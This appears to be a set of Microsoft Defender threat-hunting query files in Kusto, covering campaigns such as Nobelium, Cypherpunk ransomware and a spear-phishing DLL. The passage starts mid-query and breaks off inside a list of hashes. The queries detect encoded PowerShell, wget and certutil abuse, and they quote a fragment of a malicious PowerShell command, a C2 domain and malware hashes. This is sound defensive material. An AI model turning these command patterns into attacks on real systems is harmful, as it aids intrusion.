| where FileName =~ 'powershell.exe'
and (ProcessCommandLine hasprefix '-e' or
ProcessCommandLine contains 'frombase64')
// Check for Base64 with regex
| where ProcessCommandLine matches regex '[A-Za-z0-9+/]{50,}[=]{0,2}'
// Exclusions: The above regex may trigger false positive on legitimate SCCM activities.
// Remove this exclusion to search more broadly.
| where ProcessCommandLine !has 'Windows\\CCM\\'
| project DeviceId, Timestamp, InitiatingProcessId,
InitiatingProcessFileName, ProcessId, FileName, ProcessCommandLine
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | v | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Detect PsExec being used to spread files](../Lateral%20Movement/remote-file-creation-with-psexec.md)
* [Detect credential theft via SAM database export by LaZagne](../Credential%20Access/lazagne.md)
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/compromised-certificate[Nobelium].md
================================================
# Compromised certificate [Nobelium]
Search for the files that are using a compromised certificate associated with the Nobelium campaign.
You can remove the comments to:
* get the list of devices where there is at least one file signed with the certificate
* get the list of files signed with the certificate
* get the list of files signed with the certificate group by Devices
## Query
```Kusto
DeviceFileCertificateInfo
| where Signer == 'Solarwinds Worldwide, LLC' and SignerHash == '47d92d49e6f7f296260da1af355f941eb25360c4'
| join DeviceFileEvents on SHA1
| distinct DeviceName, FileName, FolderPath, SHA1, SHA256, IsTrusted, IsRootSignerMicrosoft, SignerHash
//| distinct DeviceName
//| distinct FileName
//| summarize mylist = make_list(FileName) by DeviceName
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [FireEye Red Team tool CVEs [Nobelium]](./fireeye-red-team-tools-CVEs%20[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/confluence-weblogic-targeted.md
================================================
# Confluence and WebLogic servers targeted by campaign
This query was originally published in the threat analytics report, *Confluence and WebLogic abuse*.
2019 has seen several seemingly related campaigns targeting Atlassian Confluence Server and Oracle WebLogic Server. Although these campaigns use different implants and delivery methods, they consistently use the same infrastructure, and exploit the same vulnerabilities.
The campaigns have specifically targeted:
* [CVE-2019-3396](https://nvd.nist.gov/vuln/detail/CVE-2019-3396) - [Software update](https://jira.atlassian.com/browse/CONFSERVER-57974)
* [CVE-2019-2725](https://nvd.nist.gov/vuln/detail/CVE-2019-2725) - [Software update](https://www.oracle.com/security-alerts/alert-cve-2019-2725.html)
The following query detects activity broadly associated with these campaigns.
## Query
```Kusto
DeviceProcessEvents
| where Timestamp >= ago(7d)
| where
// "Grandparent" process is Oracle WebLogic or some process loading Confluence
InitiatingProcessParentFileName == "beasvc.exe" or
InitiatingProcessFileName == "beasvc.exe"
or InitiatingProcessCommandLine contains "//confluence"
// Calculate for Base64 in Commandline
| extend Caps = countof(ProcessCommandLine, "[A-Z]", "regex"),
Total = countof(ProcessCommandLine, ".", "regex")
| extend Ratio = todouble(Caps) / todouble(Total)
| where
(
FileName in~ ("powershell.exe" , "powershell_ise.exe") // PowerShell is spawned
// Omit known clean processes
and ProcessCommandLine !startswith "POWERSHELL.EXE -C \"GET-WMIOBJECT -COMPUTERNAME"
and ProcessCommandLine !contains "ApplicationNo"
and ProcessCommandLine !contains "CustomerGroup"
and ProcessCommandLine !contains "Cosmos"
and ProcessCommandLine !contains "Unrestricted"
and
(
ProcessCommandLine contains "$" // PowerShell variable declaration
or ProcessCommandLine contains "-e " // Alias for "-EncodedCommand" parameter
or ProcessCommandLine contains "encodedcommand"
or ProcessCommandLine contains "wget"
//or ( Ratio > 0.4 and Ratio < 1.0) // Presence of Base64 strings
)
)
or
(
FileName =~ "cmd.exe" // cmd.exe is spawned
and ProcessCommandLine contains "@echo" and
ProcessCommandLine contains ">" // Echoing commands into a file
)
or
(
FileName =~ "certutil.exe" // CertUtil.exe abuse
and ProcessCommandLine contains "-split"
// the "-split" parameter is required to write files to the disk
)
| project
Timestamp,
InitiatingProcessCreationTime ,
DeviceId ,
Grandparent_PID = InitiatingProcessParentId,
Grandparent = InitiatingProcessParentFileName,
Parent_Account = InitiatingProcessAccountName,
Parent_PID = InitiatingProcessId,
Parent = InitiatingProcessFileName ,
Parent_Commandline = InitiatingProcessCommandLine,
Child_PID = ProcessId,
Child = FileName ,
Child_Commandline = ProcessCommandLine
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/cypherpunk-exclusive-commands.md
================================================
# Cypherpunk remote execution through PSEXESVC
This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.
Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files.
The query below surfaces commands that follow the distinctive pattern Cypherpunk operators would use to remotely execute code.
## Query
```kusto
// Searches for possible Cypherpunk ransomware activity
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where ProcessCommandLine has "Dvr /go"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/cypherpunk-remote-exec-w-psexesvc.md
================================================
# Cypherpunk remote execution through PSEXESVC
This query was originally published in the threat analytics report, *Cypherpunk ransomware leaves wake of tampered AVs*.
Cypherpunk is a human-operated ransomware campaign named after the unusual *.cypherpunk* extension given to encrypted files. The attackers often used PSEXESVC, a service that helps the PsExe.exe utility run commands on a remote device. Both PSEXESVC and PsExe.exe are legitimate parts of Windows; however, they can be repurposed by attackers to perform malicious actions.
The query below can find instances of PSEXESVC being used to launch batch files, as often occurred in Cypherpunk attacks.
## Query
```kusto
// Searches for remote batch file launch using PSEXESVC.exe
DeviceProcessEvents
| where InitiatingProcessParentFileName startswith "psexe"
| where InitiatingProcessCommandLine has ".bat"
| where ProcessCommandLine has "DisableIOAVProtection"
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Exploit | | |
| Misconfiguration | | |
| Malware, component | | |
| Ransomware | v | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/detect-cyzfc-activity.md
================================================
# Detect activity associated with malicious DLL, cyzfc.dat
These queries was originally published in the threat analytics report, *Attacks on gov't, think tanks, NGOs*.
As described further in *[Analysis of cyberattack on U.S. think tanks, non-profits, public sector by unidentified attackers](https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/)*, there was a very large spear-phishing campaign launched in November 2019.
The attackers would gain access to a target by having the user click on a link to a compromised website and download a .zip archive.
Once established on a target's device, the attackers used a malicious DLL named *cyzfc.dat* to execute additional payloads. They would call a function in the malicious DLL via the legitimate Windows process, [rundll32.exe](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32), to connect directly to their command-and-control (C2) servers.
The following queries detect activity associated with the malicious DLL, *cyzfc.dat.*, used in this campaign.
## Query
```Kusto
// Query 1: Events involving the DLL container
let fileHash = "9858d5cb2a6614be3c48e33911bf9f7978b441bf";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)
// Query 2: C2 connection
DeviceNetworkEvents
| where Timestamp > ago(10d)
| where RemoteUrl == "pandorasong.com"
// Query 3: Malicious PowerShell
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains
"-noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJ"
// Query 4: Malicious domain in default browser commandline
DeviceProcessEvents
| where Timestamp > ago(10d)
| where ProcessCommandLine contains
"https://www.jmj.com/personal/nauerthn_state_gov"
// Query 5: Events involving the ZIP
let fileHash = "cd92f19d3ad4ec50f6d19652af010fe07dca55e1";
find in (DeviceFileEvents, DeviceProcessEvents, DeviceEvents,
DeviceRegistryEvents, DeviceNetworkEvents, DeviceImageLoadEvents)
where SHA1 == fileHash or InitiatingProcessSHA1 == fileHash
| where Timestamp > ago(10d)
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|-|-|-|
| Initial access | | |
| Execution | v | |
| Persistence | | |
| Privilege escalation | | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | | |
| Misconfiguration | | |
| Malware, component | | |
## Contributor info
**Contributor:** Microsoft Threat Protection team
================================================
FILE: Campaigns/fireeye-red-team-tools-CVEs [Nobelium].md
================================================
# FireEye Red Team tool CVEs [Nobelium]
Search for the CVEs that should be prioritized and resolved to reduce the success of the FireEye Red Team tools compromised by the Nobelium activity group.
See [red_team_tool_countermeasures](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/CVEs_red_team_tools.md) on the [official FireEye repo](https://github.com/fireeye).
## Query
```Kusto
let FireEyeCVE= dynamic(
[
"CVE-2019-11510", //pre-auth arbitrary file reading from Pulse Secure SSL VPNs - CVSS 10.0
"CVE-2020-1472", //Microsoft Active Directory escalation of privileges - CVSS 10.0
"CVE-2018-13379", //pre-auth arbitrary file reading from Fortinet Fortigate SSL VPN - CVSS 9.8 //no find CVE
"CVE-2018-15961", //RCE via Adobe ColdFusion (arbitrary file upload that can be used to upload a JSP web shell) - CVSS 9.8
"CVE-2019-0604", //RCE for Microsoft Sharepoint - CVSS 9.8
"CVE-2019-0708", //RCE of Windows Remote Desktop Services (RDS) - CVSS 9.8
"CVE-2019-11580", //Atlassian Crowd Remote Code Execution - CVSS 9.8
"CVE-2019-19781", //RCE of Citrix Application Delivery Controller and Citrix Gateway - CVSS 9.8 //no find CVE
"CVE-2020-10189", //RCE for ZoHo ManageEngine Desktop Central - CVSS 9.8
"CVE-2014-1812", //Windows Local Privilege Escalation - CVSS 9.0
"CVE-2019-3398", //Confluence Authenticated Remote Code Execution - CVSS 8.8
"CVE-2020-0688", //Remote Command Execution in Microsoft Exchange - CVSS 8.8
"CVE-2016-0167", //local privilege escalation on older versions of Microsoft Windows - CVSS 7.8
"CVE-2017-11774", //RCE in Microsoft Outlook via crafted document execution (phishing) - CVSS 7.8
"CVE-2018-8581", //Microsoft Exchange Server escalation of privileges - CVSS 7.4
"CVE-2019-8394" //arbitrary pre-auth file upload to ZoHo ManageEngine ServiceDesk Plus - CVSS 6.5
]
);
DeviceTvmSoftwareVulnerabilitiesKB
| where CveId in(FireEyeCVE)
| join DeviceTvmSoftwareVulnerabilities on CveId
| project-away CveId1, VulnerabilitySeverityLevel1, AffectedSoftware
```
## Category
This query can be used to detect the following attack techniques and tactics ([see MITRE ATT&CK framework](https://attack.mitre.org/)) or security configuration states.
| Technique, tactic, or state | Covered? (v=yes) | Notes |
|------------------------|----------|-------|
| Initial access | | |
| Execution | | |
| Persistence | | |
| Privilege escalation | v | |
| Defense evasion | | |
| Credential Access | | |
| Discovery | | |
| Lateral movement | | |
| Collection | | |
| Command and control | | |
| Exfiltration | | |
| Impact | | |
| Vulnerability | v | |
| Misconfiguration | | |
| Malware, component | | |
## See also
* [Locate Nobelium implant receiving DNS response](./c2-lookup-from-nonbrowser[Nobelium].md)
* [Locate Nobelium implant receiving DNS response](./c2-lookup-response[Nobelium].md)
* [Compromised certificate [Nobelium]](./compromised-certificate[Nobelium].md)
* [FireEye Red Team tool HASHs [Nobelium]](./fireeye-red-team-tools-HASHs%20[Nobelium].md)
* [View data on software identified as affected by Nobelium campaign](./known-affected-software-orion[Nobelium].md)
* [Locate SolarWinds processes launching suspicious PowerShell commands](./launching-base64-powershell[Nobelium].md)
* [Locate SolarWinds processes launching command prompt with the echo command](./launching-cmd-echo[Nobelium].md)
* [Locate Nobelium-related malicious DLLs created in the system or locally](./locate-dll-created-locally[Nobelium].md)
* [Locate Nobelium-related malicious DLLs loaded in memory](./locate-dll-loaded-in-memory[Nobelium].md)
* [Get an inventory of SolarWinds Orion software possibly affected by Nobelium](./possible-affected-software-orion[Nobelium].md)
* [Anomalous use of MailItemAccess on other users' mailboxes [Nobelium]](../Collection/Anomaly%20of%20MailItemAccess%20by%20Other%20Users%20Mailbox%20[Nobelium].md)
* [Nobelium campaign DNS pattern](../Command%20and%20Control/DNSPattern%20[Nobelium].md)
* [Nobelium encoded domain in URL](../Command%20and%20Control/EncodedDomainURL%20[Nobelium].md)
* [Domain federation trust settings modified](../Defense%20evasion/ADFSDomainTrustMods[Nobelium].md)
* [Discovering potentially tampered devices [Nobelium]](../Defense%20evasion/Discovering%20potentially%20tampered%20devices%20[Nobelium].md)
* [Mail.Read or Mail.ReadWrite permissions added to OAuth application](../Defense%20evasion/MailPermissionsAddedToApplication[Nobelium].md)
* [Suspicious enumeration using Adfind tool](../Discovery/SuspiciousEnumerationUsingAdfind[Nobelium].md)
* [Anomalous use of MailItemAccess by GraphAPI [Nobelium]](../Exfiltration/Anomaly%20of%20MailItemAccess%20by%20GraphAPI%20[Nobelium].md)
* [MailItemsAccessed throttling [Nobelium]](../Exfiltration/MailItemsAccessed%20Throttling%20[Nobelium].md)
* [OAuth apps accessing user mail via GraphAPI [Nobelium]](../Exfiltration/OAuth%20Apps%20accessing%20user%20mail%20via%20GraphAPI%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI and directly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20both%20via%20GraphAPI%20and%20directly%20[Nobelium].md)
* [OAuth apps reading mail via GraphAPI anomaly [Nobelium]](../Exfiltration/OAuth%20Apps%20reading%20mail%20via%20GraphAPI%20anomaly%20[Nobelium].md)
* [Credentials were added to an Azure AD application after 'Admin Consent' permissions granted [Nobelium]](../Persistence/CredentialsAddAfterAdminConsentedToApp[Nobelium].md)
* [New access credential added to application or service principal](../Persistence/NewAppOrServicePrincipalCredential[Nobelium].md)
* [Add uncommon credential type to application [Nobelium]](../Privilege%20escalation/Add%20uncommon%20credential%20type%20to%20application%20[Nobelium].md)
* [ServicePrincipalAddedToRole [Nobelium]](../Privilege%20escalation/ServicePrincipalAddedToRole%20[Nobelium].md)
## Contributor info
**Contributor:** Dario Brambilla
**GitHub alias:** darioongit
**Organization:** Microsoft 365 Defender
================================================
FILE: Campaigns/fireeye-red-team-tools-HASHs [Nobelium].md
================================================
# FireEye Red Team tool HASHs [Nobelium]
This query searches for the HASHs of the FireEye Red Team tools compromised by the Nobelium activity group.
See [all-hashes.csv](https://github.com/fireeye/red_team_tool_countermeasures/blob/master/all-hashes.csv) on the [official FireEye repo](https://github.com/fireeye).
## Query
```Kusto
let MD5Hash= dynamic(
[
'013c7708f1343d684e3571453261b586',
'01d68343ac46db6065f888a094edfe4f',
'04eb45f8546e052fe348fda2425b058c',
'05b99d438dac63a5a993cea37c036673',
'09bdbad8358b04994e2c04bb26a160ef',
'0a86d64c3b25aa45428e94b6e0be3e08',
'0b1e512afe24c31531d6db6b47bac8ee',
'100d73b35f23b2fe84bf7cd37140bf4d',
'11b5aceb428c3e8c61ed24a8ca50553e',
'12c3566761495b8353f67298f15b882c',
'150224a0ccabce79f963795bf29ec75b',
'152fc2320790aa16ef9b6126f47c3cca',
'226b1ac427eb5a4dc2a00cc72c163214',
'2398ed2d5b830d226af26dedaf30f64a',
'24a7c99da9eef1c58f09cf09b9744d7b',
'25a97f6dba87ef9906a62c1a305ee1dd',
'294b1e229c3b1efce29b162e7b3be0ab',
'2b686a8b83f8e1d8b455976ae70dab6e',
'2e67c62bd0307c04af469ee8dcb220f2',
'3322fba40c4de7e3de0fda1123b0bf5d',
'3651f252d53d2f46040652788499d65a',
'383161e4deaf7eb2ebeda2c5e9c3204c',
'3b926b5762e13ceec7ac3a61e85c93bb',
'3bb34ebd93b8ab5799f4843e8cc829fa',
'3e61ca5057633459e96897f79970a46d',
'3fb9341fb11eca439b50121c6f7c59c7',
'4022baddfda3858a57c9cbb0d49f6f86',
'4326a7e863928ffbb5f6bdf63bb9126e',
'4410e95de247d7f1ab649aa640ee86fb',
'4414953fa397a41156f6fa4f9462d207',
'4456e52f6f8543c3ba76cb25ea3e9bd2',
'44887551a47ae272d7873a354d24042d',
'45736deb14f3a68e88b038183c23e597',
'4bf96a7040a683bd34c618431e571e26',
'4e7e90c7147ee8aa01275894734f4492',
'4fd62068e591cbd6f413e1c2b8f75442',
'5125979110847d35a338caac6bff2aa8',
'562ecbba043552d59a0f23f61cea0983',
'590d98bb74879b52b97d8a158af912af',
'5e14f77f85fd9a5be46e7f04b8a144f5',
'66cdaa156e4d372cfa3dea0137850d20',
'66e0681a500c726ed52e5ea9423d2654',
'68acf11f5e456744262ff31beae58526',
'6902862bd81da402e7ac70856afbe6a2',
'6a9a114928554c26675884eeb40cc01b',
'6efb58cf54d1bb45c057efcfbbd68a93',
'6f04a93753ae3ae043203437832363c4',
'79259451ff47b864d71fb3f94b1774f3',
'7af24305a409a2b8f83ece27bb0f7900',
'7c2a06ceb29cdb25f24c06f2a8892fba',
'7e6bc0ed11c2532b2ae7060327457812',
'7f8102b789303b7861a03290c79feba0',
'8025bcbe3cc81fc19021ad0fbc11cf9b',
'82773afa0860d668d7fe40e3f22b0f3e',
'82e33011ac34adfcced6cddc8ea56a81',
'83ed748cd94576700268d35666bf3e01',
'848837b83865f3854801be1f25cb9f4d',
'8c91a27bbdbe9fb0877daccd28bd7bb5',
'8d949c34def898f0f32544e43117c057',
'9529c4c9773392893a8a0ab8ce8f8ce1',
'98ecf58d48a3eae43899b45cec0fc6b7',
'995120b35db9d2f36d7d0ae0bfc9c10d',
'9c8eb908b8c1cda46e844c24f65d9370',
'9ccda4d7511009d5572ef2f8597fba4e',
'9dcb6424662941d746576e62712220aa',
'9e85713d615bda23785faf660c1b872c',
'9f401176a9dd18fa2b5b90b4a2aa1356',
'a107850eb20a4bb3cc59dbd6861eaf0f',
'a495c6d11ff3f525915345fb762f8047',
'a8b5dcfea5e87bf0e95176daa243943d',
'a91bf61cc18705be2288a0f6f125068f',
'aeb0e1d0e71ce2a08db9b1e5fb98e0aa',
'b66347ef110e60b064474ae746701d4a',
'b8415b4056c10c15da5bba4826a44ffd',
'c0598321d4ad4cf1219cc4f84bad4094',
'c74ebb6c238bbfaefd5b32d2bf7c7fcc',
'cdf58a48757010d9891c62940c439adb',
'cf752e9cd2eccbda5b8e4c29ab5554b6',
'd0a830403e56ebaa4bfbe87dbfdee44f',
'd5d3d23c8573d999f1c48d3e211b1066',
'd7cfb9fbcf19ce881180f757aeec77dd',
'd93100fe60c342e9e3b13150fd91c7d8',
'db0eaad52465d5a2b86fdd6a6aa869a5',
'dd8805d0e470e59b829d98397507d8c2',
'dfbb1b988c239ade4c23856e42d4127b',
'e0683f8ee787313cfd2c61cd0995a830',
'e4efa759d425e2f26fbc29943a30f5bd',
'e7beece34bdf67cbb8297833c5953669',
'e89efa88e3fda86be48c0cc8f2ef7230',
'e91670423930cbbd3dbf5eac1f1a7cb6',
'ece07daca53dd0a7c23dacabf50f56f1',
'edcd58ba5b1b87705e95089002312281',
'eeedc09570324767a3de8205f66a5295',
'f20824fa6e5c81e3804419f108445368',
'f3dd8aa567a01098a8a610529d892485',
'f41074be5b423afb02a74bc74222e35d',
'f59095f0ab15f26a1ead7eed8cdb4902',
'f7d9961463b5110a3d70ee2e97842ed3',
'fa255fdc88ab656ad9bc383f9b322a76',
'fbefb4074f1672a3c29c1a47595ea261'
]
);
let SHA1Hash= dynamic(
[
'5968670c0345b0ab5404bd84cb60d7af7a625020',
'fb514d59d4beabd97a25c2eefb74ce85b16edaac',
'863514b3c3f88d084bbe27bf7ba59189fbdbd902',
'0c8e807969295237c74a1016c284f99975e761b9',
'226c07a66c530350e9c89ddbe550646e94b5ff96',
'1bfaccc392df6d62fb3d8c9e69b72f0b4c5a478a',
'7bbdbe9f26a3d96e31d648551e66f91a9bd928ab',
'0613d4a7556d13889727e2e3312abfc2f6bbc046',
'c47cf12067a0ddf212a890f26dc8578d8bb705cb',
'9a6e4d1a0b682abc848e5c7a6f8782cb0213fc5c',
'af35d96b1e70d05a0c556bb9fa46af7450db1474',
'f7d483346611ce1d3e5bf8eeebfc7be122a131b9',
'4e1aead0a6c181afbd12c75f8da5a1a01acafc6c',
'8ac4feca574feb39aa887ac24803cc66fc658789',
'ac9db0eb0ef64d4b9fa68f52c713904e6fd4d6e6',
'f142936d2ab1e023ffc39d41a801d18a0c7df398',
'12e46031d953fd0a9a2b0ec573b695420eafd5f2',
'03324510e41c7b9fec35516aca947850d4ef7529',
'5d358567e549a6f8e471697f7c78bc8bdf2a6534',
'33d6eef3c7c5a496cc22acaaa7aed03d59af498a',
'803b1743cb5498543802c14e67a34c61977d73b5',
'4d0c07c7a215ec9d563b0a3e73899e56fcf94566',
'67f7ba6b4c301d372d8fb28cb231fb13a58b1dc9',
'd5adb0dc551c3c97fc929d86e039672b97ddc65e',
'063ede02eb666c16c61135aa27b1a026014cfc77',
'e54f5737847287e49a306f312995c9aba38314d4',
'e74f4f592e17a7c3c9be85b430dddeea2c3abda4',
'ae9d8a3e09b55a45c0452a293dcb01fab556f810',
'a1065c1a5d908796745e9c5be297ea2d402859dc',
'05ddb03cd423042ee6af3a14b6c4c0772eb75757',
'3c0c8e162bb8d42348beb6f4527f303c7487ce96',
'df8543eaddb005dab92ef0cdab7c19b41ef647f8',
'75e87b5ff18b2c53688e43a2e599fd6b3ab06d92',
'268d4e63b8fb38d37556384549717531e50eb65f',
'f4cb5107f1b9755ce0e8f7a7f85f5536fd204019',
'38e866dd44dce667dd19652e28324b6110e808bd',
'218651ac5b575c3f9642c2e9a5928aa22fab8483',
'472af2b122c23bf0ca10c78d389a5a7f030a3536',
'520cab82bb5bcfd8abd2301b648aafe0555044c4',
'b49972eed626571914116bae4446be571598dd81',
'3a4adb4ff64ddcdd0f1b2a86f04d2b72da5d9c92',
'22109552d6af71d392de199e21ae272009db608a',
'ccc5cb5b399bbf9d2959aafdc90233fa4ca9380d',
'849f81a20a4bb9985066d9e38f4adfba07bc5444',
'cc542c0f873470b3eb292f082771eec61c16b3d7',
'590bd7609edf9ea8dab0b5fbc38393a870b329de',
'41c11e48c3a64484b38a2d64ab3b9453bae05a14',
'e468a7947c497b435bdf1a50cf0f73abf849c79b',
'a5c4975199bfe820bd0076bb5b7c68be93ba7bf8',
'f38bf87c73ac188fc60a2bfa5bba1c838148a8a1',
'a1e3e694b147767efcab214f099a1488726abd0f',
'aaa153236b7676899572760482951d3edad7a8b5',
'25be1b61ce1f9dcc498c64a5a753efb96df3ae4c',
'39bb0e9765e0137d09dc8d41fa1dded24e1fdeed',
'5b93345c18faa20ef1f2d3f7fb5a299c27e4b66d',
'f5a605c29af773c9f5604c8f5546c991d24d2dc2',
'db99f1ef9b630fc16deb23d8c7d7df2441bc80e5',
'c226cb69f2a017712cc94493f51d7726f933bcda',
'5b3b08f15ac3bbf2644f88b0615536f33a1ff1a8',
'42f81c4cfca1438371829b7ad5e7b3db54a2cddf',
'1c23dd83c6ebba6f870b1ad02f326ea730ea53a5',
'2b663679da2a7070f91945784ac167ed3ded7280',
'fd1e67da7919dc7d0fbab0c5d02ee6e12537f2ef',
'93c1078cb6d0aeab90eb0b83ec4a737ce7bcccdc',
'05d900d16d2738b0bded3ba4a60ff24adc0776f1',
'fc19e8dae2215446ade30b6bc7aa5d4b0d6627f7',
'f30ef3957c930cf2aa74361d4d229777e7ee40ef',
'964e161dd92df9b160a6f7c7d1dedf216e8fed2c',
'bf4254555a5f4d3299aae8d4ffc28bbb1dfec3c6',
'50726acc45f673d6f0924a8bf030f3f07b1cd9c5',
'd535de08875cef1c49bfa2532281fa1254a8cb93',
'7935da6efb19ea558fe6b1f98f3b244b4a74794b',
'589f7878efd02dd5a0832c6e523f4914cbcfd450',
'8f7d4f9eed06c1d175ef6321fb7110183aabbb7c',
'467b32e7414308b245c6c004303a5638e0fa7bdf',
'b98cded462dfd80c682c953830e3df744cac756d',
'3df6b6fb4870b66931e91a59a5f9c013198bc310',
'c26f164336ea82a40b2186270249d2fe5571b12d',
'e53ff219a6d5d0713ddfa54f8fff7ff703e5e85f',
'fa9905d231bb1565086dcf2608ee2125bf585c01',
'c1fe1a306c4d7106d5a0bb47d3880836d9ecc2c6',
'7323ca7b92edbd195b2d7e18c91fd48b4c96a0cc',
'f9881d2380363cb7b3d316bbf2bde6c2d7089681',
'ca112215ba3abf12bd65e15f018def811b9d5938',
'bcdf6ddccab0c348d85ca52077ffbef12f94a336',
'28a15a0b532c47110297aa6f4f46bad4d72235a2',
